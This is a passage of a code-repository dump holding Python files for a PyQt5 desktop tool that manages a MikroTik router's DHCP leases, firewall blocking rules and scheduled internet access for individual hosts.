self.make('/system/scheduler/remove', '=.id=' + shed_id)\n\n def show_shed(self, host, method):\n answer = self.getanswer('/system/scheduler/print', '?name={}_'.format(method) + host)\n logging.debug(answer)\n if \">>> !re\" in answer.split('\\n'):\n for line in answer.split('\\n'):\n if match('^.*start-date=.*', line):\n shed_startd = match('^.*start-date=(.*)', line).group(1)\n if match('^.*start-time=.*', line):\n shed_startt = match('^.*start-time=(.*)', line).group(1)\n if match('^.*interval=.*', line):\n shed_interv = match('^.*interval=(.*)', line).group(1)\n return [int(shed_startd.split('/')[1]), int(monts_rev[shed_startd.split('/')[0]]),\n int(shed_startd.split('/')[2]), int(shed_startt.split(':')[0]),\n int(shed_startt.split(':')[1]), int(shed_startt.split(':')[0])], shed_interv\n else:\n return False, False\n\n def modify_shed(self, host, method, disable='yes'):\n shed_id = self.make('/system/scheduler/print', '?name={}_'.format(method) + host)\n if shed_id:\n self.make('/system/scheduler/set', '=.id=' + shed_id, '=disabled='+disable)\n" }, { "alpha_fraction": 0.6242219805717468, "alphanum_fraction": 0.642704427242279, "avg_line_length": 45.56415939331055, "blob_id": "7600b0923221891caa4194ce583b90197f2d0ea8", "content_id": "7cf6fbc54a9f8efd40350674d766ffed27138ad8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21809, "license_type": "no_license", "max_line_length": 120, "num_lines": 452, "path": "/MAIN.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "import sys\nimport mainwin\nimport but1\nimport logs\nimport message\nimport mikr_api\nimport conf\nimport sys\nimport io\nimport dhcp_hosts\nimport filter\nimport scirpt\nimport scheduler\nimport sched_but\nimport logging\nfrom contextlib import redirect_stdout\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nfrom PyQt5 import QtCore\n\n\nclass MainWindow:\n def __init__(self):\n self.app = QApplication(sys.argv)\n # Окно кнопки 3 (logger)\n 
self.uibut3 = logs.Ui_Form()\n self.windowbut3 = QMainWindow()\n self.windowbut3.move(700, 600)\n self.uibut3.setupUi(self.windowbut3)\n # logger conf\n self.logger = logging.getLogger(__name__)\n self.gui = logging.StreamHandler(Writer(self.uibut3))\n self.logfile = logging.FileHandler('mikrotik.log')\n self.logger.addHandler(self.gui)\n self.logger.addHandler(self.logfile)\n # Соединение с mikrotik\n self.s = None\n self.router = None\n self.start_connect()\n self.login()\n self.logger.debug(' Запускаем главное окно, передаем список хостов')\n # обращаемся к классу, по которому можно получить список хостов, а также задать статику и т.п\n self.router_hosts = dhcp_hosts.DhcpHosts(self.router)\n self.hosts_dict = self.router_hosts.hosts\n # обращаемся к классу, по которому можно создать\\удалить правило в firewall\n self.router_filter = filter.Filter(self.router)\n # Обращаемся к классу, по работе с скриптами\n self.wwscript = scirpt.Scripts(self.router)\n # Обращаемся к классу по работе с расписанием\n self.scheduler = scheduler.Scheduler(self.router)\n # Главное окно\n self.Mui = mainwin.Ui_MainWindow()\n self.Mwindow = QMainWindow()\n self.Mwindow.move(300, 300)\n self.Mui.setupUi(self.Mwindow)\n self.Mui.pushButton.clicked.connect(self.button1)\n self.Mui.pushButton_3.clicked.connect(self.button3)\n self.Mui.pushButton_4.clicked.connect(self.refresh)\n # Окно кнопки 1\n self.uibut1 = but1.Ui_Form()\n self.windowbut1 = QMainWindow()\n self.uibut1.setupUi(self.windowbut1)\n self.uibut1.pushButton.clicked.connect(self.pushbuttonbut1_1)\n self.uibut1.pushButton_2.clicked.connect(self.pushbuttonbut1_2)\n self.uibut1.pushButton_3.clicked.connect(self.pushbuttonbut1_3)\n self.uibut1.pushButton_4.clicked.connect(self.pushbuttonbut1_4)\n # Окно кнопки 2(1-4) (расписание)\n self.uibut2 = but1.Ui_Form()\n self.windowbut2 = QMainWindow()\n self.uibut2.setupUi(self.windowbut2)\n self.uibut2.pushButton.clicked.connect(self.pushbuttonbut2_1)\n self.uibut2.pushButton_2.clicked.connect(self.pushbuttonbut2_2)\n self.uibut2.pushButton_3.clicked.connect(self.pushbuttonbut2_3)\n self.uibut2.pushButton_4.clicked.connect(self.pushbuttonbut2_4)\n self.uibut2.pushButton_2.setDisabled(True)\n self.uibut2.pushButton_3.setDisabled(True)\n self.uibut2.pushButton_4.setDisabled(True)\n # Окно сообщения об ошибке\n self.uimessage = message.Ui_Form()\n self.windowmessage = QMainWindow()\n self.windowmessage.move(500, 500)\n self.uimessage.setupUi(self.windowmessage)\n # Окно кнопки sched_but\n self.uished_but = sched_but.Ui_Form()\n self.windowshed_but = QMainWindow()\n self.windowshed_but.move(1000, 300)\n self.uished_but.setupUi(self.windowshed_but)\n self.uished_but.dateTimeEdit_2.setDisabled(True)\n self.uished_but.dateTimeEdit_4.setDisabled(True)\n self.uished_but.label_2.setDisabled(True)\n self.uished_but.label_5.setDisabled(True)\n self.uished_but.label_6.setDisabled(True)\n self.uished_but.radioButton_4.checkStateSet()\n self.uished_but.radioButton_4.setDisabled(True)\n self.uished_but.radioButton_5.setDisabled(True)\n self.uished_but.radioButton_6.setDisabled(True)\n self.uished_but.radioButton.setChecked(True)\n self.uished_but.radioButton_6.setChecked(True)\n self.time_disabeled_2 = True\n self.uished_but.pushButton_2.clicked.connect(self.set_en_2)\n self.date_en = False\n self.interval_en = False\n self.date_dis = False\n self.date_en2 = False\n self.date_dis2 = False\n self.interval_en2 = False\n\n def set_en_2(self):\n if self.time_disabeled_2:\n self.uished_but.label_2.setDisabled(False)\n 
self.uished_but.label_5.setDisabled(False)\n self.uished_but.label_6.setDisabled(False)\n self.uished_but.radioButton_4.setDisabled(False)\n self.uished_but.radioButton_5.setDisabled(False)\n self.uished_but.radioButton_6.setDisabled(False)\n self.uished_but.pushButton_2.setText('-')\n self.uished_but.dateTimeEdit_2.setDisabled(False)\n self.uished_but.dateTimeEdit_4.setDisabled(False)\n self.time_disabeled_2 = False\n else:\n self.uished_but.label_2.setDisabled(True)\n self.uished_but.label_5.setDisabled(True)\n self.uished_but.label_6.setDisabled(True)\n self.uished_but.radioButton_4.setDisabled(True)\n self.uished_but.radioButton_5.setDisabled(True)\n self.uished_but.radioButton_6.setDisabled(True)\n self.uished_but.pushButton_2.setText('+')\n self.uished_but.dateTimeEdit_2.setDisabled(True)\n self.uished_but.dateTimeEdit_4.setDisabled(True)\n self.time_disabeled_2= True\n\n def start_connect(self):\n self.s = mikr_api.main(conf.r1_ipaddr)\n if not self.s:\n self.uimessage.label.setText('Нет соединения!!!!')\n self.uimessage.pushButton.clicked.connect(self.windowmessage.close)\n self.windowmessage.show()\n self.logger.critical(' Соединение с mikrotik не установилась!')\n sys.exit(self.app.exec_())\n self.router = mikr_api.ApiRos(self.s)\n self.logger.debug(' Соединение по сети прошло успешно')\n\n def login(self):\n self.logger.debug(' Попытка логина (авторизация)....')\n with io.StringIO() as buf, redirect_stdout(buf):\n try:\n self.router.login(conf.r1_login, conf.r1_passwd1)\n except AttributeError:\n self.uimessage.label.setText(' Не авторизован!')\n self.uimessage.pushButton.clicked.connect(self.windowmessage.close)\n self.windowmessage.show()\n sys.exit(self.app.exec_())\n sys.exit()\n output = buf.getvalue()\n if \">>> =message=cannot log in\" in output.split('\\n'):\n self.logger.critical(' Логин или пароль не верен!')\n self.uimessage.label.setText(' Не авторизован!')\n self.uimessage.pushButton.clicked.connect(self.windowmessage.close)\n self.windowmessage.show()\n sys.exit(self.app.exec_())\n sys.exit()\n self.logger.debug(' Логин прошел успешно')\n\n def set_combo_box(self):\n self.Mui.comboBox.clear()\n self.Mui.comboBox.addItem('None')\n for host in self.hosts_dict:\n self.Mui.comboBox.addItem(self.hosts_dict[host]['host-name'])\n\n def run(self):\n self.set_combo_box()\n self.logger.debug('заполняем выпадающий список')\n self.Mwindow.show()\n sys.exit(self.app.exec_())\n\n def button1(self):\n self.Mui.comboBox.close()\n self.Mui.label.setText('Выбран хост:')\n self.Mui.label_2.setText(self.Mui.comboBox.currentText())\n if self.Mui.comboBox.currentText() == 'None':\n if self.windowbut1:\n self.windowbut1.hide()\n self.logger.debug(' host- none- warning')\n self.uimessage.label.setText(' ВЫБЕРИТЕ ХОСТ!!!\\nЕсли хостов нет -\\nпопробуйте\\n'\n 'переподключить\\nустройство к сети!')\n self.uimessage.pushButton.clicked.connect(self.windowmessage.hide)\n self.windowmessage.show()\n return\n self.windowbut1.move(700, 300)\n self.windowbut2.close()\n if self.router_filter.isblocked(self.Mui.comboBox.currentText(), 'block'):\n self.dynamic()\n self.uibut1.pushButton_2.setText(\"unblock inet\")\n self.uibut1.pushButton_3.setDisabled(True)\n self.uibut1.pushButton_4.setDisabled(True)\n elif self.router_filter.isblocked(self.Mui.comboBox.currentText(), 'sched'):\n self.uibut1.pushButton.setDisabled(True)\n self.uibut1.pushButton_2.setDisabled(True)\n self.uibut1.pushButton_3.setDisabled(True)\n self.uibut1.pushButton_4.setDisabled(False)\n else:\n 
self.uibut1.pushButton_2.setText(\"block inet\")\n self.uibut1.pushButton_3.setDisabled(False)\n self.uibut1.pushButton_4.setDisabled(False)\n self.dynamic()\n if self.windowmessage:\n self.windowmessage.hide()\n self.logger.debug('modify \"' + self.Mui.comboBox.currentText() + '\" host')\n self.windowbut1.setWindowTitle(self.Mui.comboBox.currentText())\n self.uibut1.hostname = self.Mui.comboBox.currentText()\n self.windowbut1.show()\n\n def dynamic(self):\n try:\n if self.hosts_dict[self.Mui.comboBox.currentText()]['dynamic'] == 'false':\n self.uibut1.pushButton.setText('already static')\n self.uibut1.pushButton.setDisabled(True)\n self.uibut1.pushButton_3.setDisabled(False)\n self.uibut1.pushButton_2.setDisabled(False)\n self.uibut1.pushButton_4.setDisabled(False)\n else:\n self.uibut1.pushButton_4.setDisabled(True)\n self.uibut1.pushButton.setText('make static')\n self.uibut1.pushButton_2.setDisabled(True)\n self.uibut1.pushButton.setDisabled(False)\n self.uibut1.pushButton_3.setDisabled(True)\n except KeyError:\n self.no_shuch_host()\n\n def button3(self):\n self.logger.debug('\"Логи\"')\n if self.windowmessage:\n self.windowmessage.hide()\n if self.windowbut1:\n self.windowbut1.hide()\n self.windowbut3.show()\n\n def pushbuttonbut1_1(self):\n self.logger.debug('make static \"' + self.Mui.comboBox.currentText() + '\" host')\n self.router_hosts.make_static(self.Mui.comboBox.currentText())\n self.start_connect()\n self.login()\n self.router_hosts = dhcp_hosts.DhcpHosts(self.router)\n self.hosts_dict = self.router_hosts.hosts\n self.dynamic()\n\n def pushbuttonbut1_2(self):\n self.windowbut1.close()\n self.windowshed_but.close()\n self.router_filter = filter.Filter(self.router)\n if self.router_filter.isblocked(self.Mui.comboBox.currentText(), 'sched'):\n self.uibut1.pushButton_2.setDisabled(True)\n self.uibut1.pushButton_3.setDisabled(True)\n else:\n self.buttonbut1_2()\n\n def buttonbut1_2(self):\n if self.router_filter.isblocked(self.Mui.comboBox.currentText(), 'block'):\n self.logger.debug('turn on internet \"' + self.Mui.comboBox.currentText() + '\" enable host in firewall')\n self.router_filter.delete_rule(self.Mui.comboBox.currentText(), 'block')\n self.uibut1.pushButton_2.setText(\"block inet\")\n self.uibut1.pushButton_3.setDisabled(False)\n self.uibut1.pushButton_4.setDisabled(False)\n else:\n self.logger.debug('turn off internet \"' + self.Mui.comboBox.currentText() + '\" disable host in firewall')\n self.router_filter.forwardblock(self.Mui.comboBox.currentText(), 'block')\n self.uibut1.pushButton_2.setText(\"unblock inet\")\n self.uibut1.pushButton_3.setDisabled(True)\n self.uibut1.pushButton_4.setDisabled(True)\n\n def pushbuttonbut1_3(self):\n self.windowbut1.hide()\n self.logger.debug('remove static lease host \"' + self.Mui.comboBox.currentText() + '\"')\n self.router_hosts.remove_static(self.Mui.comboBox.currentText())\n self.refresh()\n self.uimessage.label.setText('Удалено!\\nНужно будет\\nпереподключить\\nустройства к сети'\n '\\nдля дальнейшей\\nработы!')\n self.uimessage.pushButton.clicked.connect(self.windowmessage.hide)\n self.windowmessage.show()\n\n def pushbuttonbut1_4(self):\n self.windowbut2.move(800, 300)\n self.windowbut2.setWindowTitle('Расписание')\n self.uibut2.pushButton.setText('Настроить')\n if self.router_filter.isblocked(self.Mui.comboBox.currentText(), 'sched'):\n self.logger.debug('Правила в firewall уже созданы')\n self.uibut2.pushButton_2.setDisabled(False)\n self.uibut2.pushButton_3.setDisabled(True)\n 
self.uibut2.pushButton_4.setDisabled(False)\n self.uibut2.pushButton_2.setText(\"Включить\")\n self.uibut2.pushButton_3.setText(\"Выключить\")\n self.uibut2.pushButton_4.setText('Удалить')\n self.windowbut1.close()\n self.windowbut2.show()\n\n def pushbuttonbut2_1(self):\n self.uished_but.pushButton.clicked.connect(self.set_time)\n self.date_en, self.date_dis, self.interval_en = self.show_current_sched_rules('Enable_1', 'Disable_1')\n self.date_en2, self.date_dis2, self.interval_en2 = self.show_current_sched_rules('Enable_2', 'Disable_2')\n if self.date_en:\n self.get_time(self.date_en, self.date_dis, self.uished_but.dateTimeEdit, self.uished_but.dateTimeEdit_3)\n if self.date_en2:\n self.get_time(self.date_en2, self.date_dis2, self.uished_but.dateTimeEdit_2, self.uished_but.dateTimeEdit_4)\n self.set_rbut(self.uished_but.radioButton, self.uished_but.radioButton_2, self.uished_but.radioButton_3,\n self.interval_en)\n self.set_rbut(self.uished_but.radioButton_6, self.uished_but.radioButton_5, self.uished_but.radioButton_4,\n self.interval_en2)\n self.windowshed_but.show()\n\n def show_current_sched_rules(self, first, second):\n date_en, interval = self.scheduler.show_shed(self.Mui.comboBox.currentText(), first)\n date_dis, interval = self.scheduler.show_shed(self.Mui.comboBox.currentText(), second)\n return date_en, date_dis, interval\n\n def get_time(self, de, dd, qdt1, qdt2):\n date_enable = QtCore.QDateTime(QtCore.QDate(de[2], de[1], de[0]), QtCore.QTime(de[3], de[4], de[5]))\n date_disable = QtCore.QDateTime(QtCore.QDate(dd[2], dd[1], dd[0]), QtCore.QTime(dd[3], dd[4], dd[5]))\n qdt1.setDateTime(date_enable)\n qdt2.setDateTime(date_disable)\n\n def set_rbut(self, but1, but2, but3, interval):\n if interval == '1d':\n but1.setChecked(True)\n elif interval == '1w':\n but2.setChecked(True)\n else:\n but3.setChecked(True)\n\n def set_time(self):\n self.Mui.pushButton.setText('wait...')\n self.Mui.pushButton.setDisabled(True)\n self.windowbut2.close()\n self.windowshed_but.close()\n QtCore.QTimer.singleShot(4000, self.unhide)\n if not self.router_filter.isblocked(self.Mui.comboBox.currentText(), 'sched'):\n self.router_filter.forwardblock(self.Mui.comboBox.currentText(), 'sched')\n self.router_filter.disable_rule(self.Mui.comboBox.currentText(), 'sched')\n self.uibut2.pushButton.setDisabled(True)\n self.uibut2.pushButton_2.setDisabled(False)\n self.uibut2.pushButton_3.setDisabled(True)\n self.uibut2.pushButton_4.setDisabled(False)\n if self.date_en:\n self.delete_old_rules('Enable_1', 'Disable_1')\n if self.date_en2:\n self.delete_old_rules('Enable_2', 'Disable_2')\n self.init_script('Enable_1', 'Disable_1')\n self.date_en = self.uished_but.dateTimeEdit.dateTime().toString(format('MM*dd/yyyy*hh:mm:ss'))\n self.date_dis = self.uished_but.dateTimeEdit_3.dateTime().toString(format('MM*dd/yyyy*hh:mm:ss'))\n self.interval_en = self.check_button(self.uished_but.radioButton, self.uished_but.radioButton_2)\n self.scheduler.make_sched(self.Mui.comboBox.currentText(), self.date_en, self.interval_en, 'Enable_1')\n self.scheduler.make_sched(self.Mui.comboBox.currentText(), self.date_dis, self.interval_en, 'Disable_1')\n if not self.time_disabeled_2:\n self.init_script('Enable_2', 'Disable_2')\n self.date_en2 = self.uished_but.dateTimeEdit_2.dateTime().toString(format('MM*dd/yyyy*hh:mm:ss'))\n self.date_dis2 = self.uished_but.dateTimeEdit_4.dateTime().toString(format('MM*dd/yyyy*hh:mm:ss'))\n self.interval_en2 = self.check_button(self.uished_but.radioButton_6, self.uished_but.radioButton_5)\n 
self.scheduler.make_sched(self.Mui.comboBox.currentText(), self.date_en2, self.interval_en2, 'Enable_2')\n self.scheduler.make_sched(self.Mui.comboBox.currentText(), self.date_dis2, self.interval_en2, 'Disable_2')\n\n def unhide(self):\n self.Mui.pushButton.setText('Изменить')\n self.Mui.pushButton.setDisabled(False)\n self.uibut2.pushButton.setText('Настроить')\n self.uibut2.pushButton.setDisabled(False)\n\n def init_script(self, first, second):\n if not self.wwscript.script_is_here(self.Mui.comboBox.currentText(), first):\n self.wwscript.make_script(self.Mui.comboBox.currentText(),\n self.hosts_dict[self.Mui.comboBox.currentText()]['address'], first, 'no')\n self.wwscript.make_script(self.Mui.comboBox.currentText(),\n self.hosts_dict[self.Mui.comboBox.currentText()]['address'], second, 'yes')\n\n def delete_old_rules(self, first, second):\n self.scheduler.remove_shed(self.Mui.comboBox.currentText(), first)\n self.scheduler.remove_shed(self.Mui.comboBox.currentText(), second)\n self.wwscript.remove_script(self.Mui.comboBox.currentText(), first)\n self.wwscript.remove_script(self.Mui.comboBox.currentText(), second)\n\n def check_button(self, rbut1, rbut2):\n if rbut1.isChecked():\n interval = '1d 00:00:00'\n elif rbut2.isChecked():\n interval = '7d 00:00:00'\n else:\n interval = '365d 00:00:00'\n return interval\n\n def pushbuttonbut2_2(self):\n self.change_stat('no')\n self.uibut2.pushButton_2.setDisabled(True)\n self.uibut2.pushButton_3.setDisabled(False)\n\n def change_stat(self, disable='yes'):\n self.scheduler.modify_shed(self.Mui.comboBox.currentText(), 'Enable_1', disable)\n self.scheduler.modify_shed(self.Mui.comboBox.currentText(), 'Disable_1', disable)\n self.scheduler.modify_shed(self.Mui.comboBox.currentText(), 'Enable_2', disable)\n self.scheduler.modify_shed(self.Mui.comboBox.currentText(), 'Disable_2', disable)\n\n def pushbuttonbut2_3(self):\n self.change_stat()\n self.uibut2.pushButton_2.setDisabled(False)\n self.uibut2.pushButton_3.setDisabled(True)\n\n def pushbuttonbut2_4(self):\n self.windowshed_but.close()\n self.uibut2.pushButton.setText('wait...')\n self.uibut2.pushButton.setDisabled(True)\n self.Mui.pushButton.setText('wait...')\n self.Mui.pushButton.setDisabled(True)\n QtCore.QTimer.singleShot(4000, self.unhide)\n self.delete_old_rules('Enable_1', 'Disable_1')\n self.delete_old_rules('Enable_2', 'Disable_2')\n self.router_filter.delete_rule(self.Mui.comboBox.currentText(), 'sched')\n self.uibut2.pushButton_2.setDisabled(True)\n self.uibut2.pushButton_3.setDisabled(True)\n self.uibut2.pushButton_4.setDisabled(True)\n\n def refresh(self):\n self.logger.debug(' refresh button pressed')\n self.logger.debug(' Restart')\n self.Mui.comboBox.clear()\n self.Mui.label_2.setText('')\n self.Mui.label.setText('Выберите хост:')\n self.Mui.comboBox.show()\n self.start_connect()\n self.login()\n self.router_hosts = dhcp_hosts.DhcpHosts(self.router)\n self.hosts_dict = self.router_hosts.hosts\n self.set_combo_box()\n self.windowbut1.close()\n self.windowbut2.close()\n self.windowbut3.close()\n self.windowshed_but.close()\n\n def no_shuch_host(self):\n self.uimessage.label.setText('Нажмите \"Обновить\"')\n self.uimessage.pushButton.clicked.connect(self.windowmessage.close)\n self.windowmessage.show()\n\n\nclass Writer:\n def __init__(self, widget):\n self.widget = widget\n\n def write(self, text):\n self.widget.textBrowser.appendPlainText(text)\n\n\nif __name__ == '__main__':\n logging.basicConfig(filename='mikrotik.log', filemode='w', level=logging.DEBUG, format='%(asctime)s 
%(message)s')\n logging.debug(' Start')\n widget = MainWindow()\n widget.run()\n" }, { "alpha_fraction": 0.6664080619812012, "alphanum_fraction": 0.7001551389694214, "avg_line_length": 47.60377502441406, "blob_id": "a152478d7c72a4b79c44ca6df1bd0dabb95d26e9", "content_id": "6f491055c3142a9294229f247663a37cbf0a4270", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2622, "license_type": "no_license", "max_line_length": 85, "num_lines": 53, "path": "/mainwin.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'untilted.ui'\n#\n# Created by: PyQt5 UI code generator 5.5.1\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtWidgets\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(468, 155)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.pushButton = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton.setGeometry(QtCore.QRect(350, 20, 99, 27))\n self.pushButton.setObjectName(\"pushButton\")\n self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton_3.setGeometry(QtCore.QRect(350, 70, 99, 27))\n self.pushButton_3.setObjectName(\"pushButton_3\")\n self.comboBox = QtWidgets.QComboBox(self.centralwidget)\n self.comboBox.setGeometry(QtCore.QRect(220, 20, 85, 27))\n self.comboBox.setObjectName(\"comboBox\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(30, 20, 131, 27))\n self.label.setObjectName(\"label\")\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\n self.label_2.setGeometry(QtCore.QRect(140, 20, 80, 27))\n self.label_2.setObjectName(\"label_2\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 468, 25))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n self.pushButton_4 = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton_4.setGeometry(QtCore.QRect(20, 70, 180, 27))\n self.pushButton_4.setObjectName(\"pushButton_4\")\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Mikrotik host control\"))\n self.pushButton.setText(_translate(\"MainWindow\", \"Изменить\"))\n self.pushButton_3.setText(_translate(\"MainWindow\", \"Логи\"))\n self.pushButton_4.setText(_translate(\"MainWindow\", \"Обновить список хостов\"))\n self.label.setText(_translate(\"MainWindow\", \"Выберите хост:\"))\n\n\n" }, { "alpha_fraction": 0.5071384310722351, "alphanum_fraction": 0.5083798766136169, "avg_line_length": 45.60869598388672, "blob_id": "c5da0413016538087cedecb72c2f8cdda6605548", "content_id": "a9b429299abfe5a173ee9ed54012aeecbd0d4628", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3222, "license_type": "no_license", "max_line_length": 121, "num_lines": 69, "path": "/filter.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "import io\nimport dhcp_hosts\nimport logging\nfrom 
contextlib import redirect_stdout\nfrom re import match\n\n\nclass Filter:\n def __init__(self, router):\n self.router = router\n self.ids = dict()\n self.answer = None\n self.hosts_dict = dhcp_hosts.DhcpHosts.hosts\n\n def forwardblock(self, host, method):\n self.hosts_dict = dhcp_hosts.DhcpHosts.hosts\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/firewall/filter/add', '=chain=forward', '=action=reject',\n '=reject-with=icmp-admin-prohibited',\n '=comment=' + method + '_' + self.hosts_dict[host]['address'], '=place-before=0',\n '=src-address=' + self.hosts_dict[host]['address']])\n answer = buf.getvalue()\n logging.debug(answer)\n\n def isblocked(self, host, method):\n self.hosts_dict = dhcp_hosts.DhcpHosts.hosts\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/firewall/filter/print', '?comment=' + method + '_'\n + self.hosts_dict[host]['address']])\n self.answer = buf.getvalue()\n logging.debug(self.answer)\n if \">>> !re\" in self.answer.split('\\n'):\n for line in self.answer.split('\\n'):\n if match('^.*\\.id.*', line):\n self.ids[host] = match('^.*\\.id=(.*)', line).group(1)\n return True\n else:\n return False\n\n def disable_rule(self, host, method):\n self.hosts_dict = dhcp_hosts.DhcpHosts.hosts\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/firewall/filter/print', '?comment=' + method + '_'\n + self.hosts_dict[host]['address']])\n self.answer = buf.getvalue()\n logging.debug(self.answer)\n if \">>> !re\" in self.answer.split('\\n'):\n for line in self.answer.split('\\n'):\n if match('^.*\\.id.*', line):\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/firewall/filter/set', '=.id=' + match('^.*\\.id=(.*)', line).group(1),\n '=disabled=yes'])\n disabled = buf.getvalue()\n logging.debug(disabled)\n\n def delete_rule(self, host, method):\n self.hosts_dict = dhcp_hosts.DhcpHosts.hosts\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/firewall/filter/print', '?comment=' + method + '_'\n + self.hosts_dict[host]['address']])\n self.answer = buf.getvalue()\n logging.debug(self.answer)\n if \">>> !re\" in self.answer.split('\\n'):\n for line in self.answer.split('\\n'):\n if match('^.*\\.id.*', line):\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/firewall/filter/remove', '=.id=' + match('^.*\\.id=(.*)', line).group(1),])\n deleted = buf.getvalue()\n logging.debug(deleted)\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5217241644859314, "alphanum_fraction": 0.5227586030960083, "avg_line_length": 45.015872955322266, "blob_id": "41a20949c0d997d50b18141d459dccc7b6133609", "content_id": "30aa54ec639fbfb9e1032cf05a30593f06fe084b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2993, "license_type": "no_license", "max_line_length": 120, "num_lines": 63, "path": "/dhcp_hosts.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "import io\nimport logging\nfrom contextlib import redirect_stdout\n\n\nclass DhcpHosts:\n\n hosts = dict()\n\n def __init__(self, router):\n self.__class__.hosts = dict()\n self.router = router\n self.get_hosts()\n\n def talk(self, question):\n logging.debug(' Отправляю запрос {}....'.format(question))\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk([\"{}\".format(question)])\n answer = buf.getvalue()\n if \">>> =message=no such command\" in answer.split('\\n') \\\n or \">>> =message=no such command prefix\" in 
answer.split('\\n'):\n logging.debug(' Получен ответ {}!'.format(answer))\n logging.debug(' Введенный запрос не корректен!')\n else:\n return answer\n\n def get_hosts(self):\n try:\n hosts_list = self.talk('/ip/dhcp-server/lease/print').split('>>> !re')\n hosts_list.remove('<<< /ip/dhcp-server/lease/print\\n<<< \\n')\n for host in range(0, len(hosts_list)):\n self.__class__.hosts[host] = {}\n for element in hosts_list[host].split('\\n'):\n if element == '>>> ' or element == '':\n continue\n elif element == '>>> !done':\n break\n self.__class__.hosts[host].update({element.split('=')[1]: element.split('=')[2]})\n self.__class__.hosts = {nhost['host-name']: nhost for nhost in self.__class__.hosts.values()}\n logging.info(' Хосты: {}'.format(self.__class__.hosts.keys()))\n logging.debug(':')\n logging.debug(self.__class__.hosts)\n except ValueError:\n logging.debug('Совсем нет Lease....')\n self.__class__.hosts = {'None': {'host-name': 'None'}}\n\n def make_static(self, *args):\n for arhost in args:\n if arhost in [kwhost['host-name'] for kwhost in self.__class__.hosts.values()]:\n logging.debug(' Задаем статику для {}, ID - {}'.format(arhost, self.__class__.hosts[arhost]['.id']))\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/dhcp-server/lease/make-static', '=.id='+self.__class__.hosts[arhost]['.id']])\n answer = buf.getvalue()\n logging.debug(answer)\n\n def remove_static(self, *args):\n for arhost in args:\n if arhost in [kwhost['host-name'] for kwhost in self.__class__.hosts.values()]:\n logging.debug(' Удаляем lease для {}, ID - {}'.format(arhost, self.__class__.hosts[arhost]['.id']))\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(['/ip/dhcp-server/lease/remove', '=.id='+self.__class__.hosts[arhost]['.id']])\n answer = buf.getvalue()\n logging.debug(answer)\n\n" }, { "alpha_fraction": 0.6230893731117249, "alphanum_fraction": 0.672720730304718, "avg_line_length": 51.424530029296875, "blob_id": "f43c9bcc8b3b005006625d7b9d8be66c02ed4350", "content_id": "25cc69c5ec69a70670324cb8994cbe637c89a3f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5669, "license_type": "no_license", "max_line_length": 83, "num_lines": 106, "path": "/sched_but.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'untitled3.ui'\n#\n# Created by: PyQt5 UI code generator 5.5.1\n#\n# WARNING! 
All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_Form(object):\n def setupUi(self, Form):\n Form.setObjectName(\"Form\")\n Form.resize(287, 381)\n Form.setAutoFillBackground(False)\n self.pushButton = QtWidgets.QPushButton(Form)\n self.pushButton.setGeometry(QtCore.QRect(100, 350, 99, 27))\n self.pushButton.setObjectName(\"pushButton\")\n self.pushButton_2 = QtWidgets.QPushButton(Form)\n self.pushButton_2.setGeometry(QtCore.QRect(130, 180, 31, 21))\n self.pushButton_2.setObjectName(\"pushButton_2\")\n self.label_7 = QtWidgets.QLabel(Form)\n self.label_7.setGeometry(QtCore.QRect(10, 0, 251, 31))\n self.label_7.setObjectName(\"label_7\")\n self.label = QtWidgets.QLabel(Form)\n self.label.setGeometry(QtCore.QRect(0, 30, 91, 21))\n self.label.setObjectName(\"label\")\n self.dateTimeEdit = QtWidgets.QDateTimeEdit(Form)\n self.dateTimeEdit.setGeometry(QtCore.QRect(90, 30, 194, 27))\n 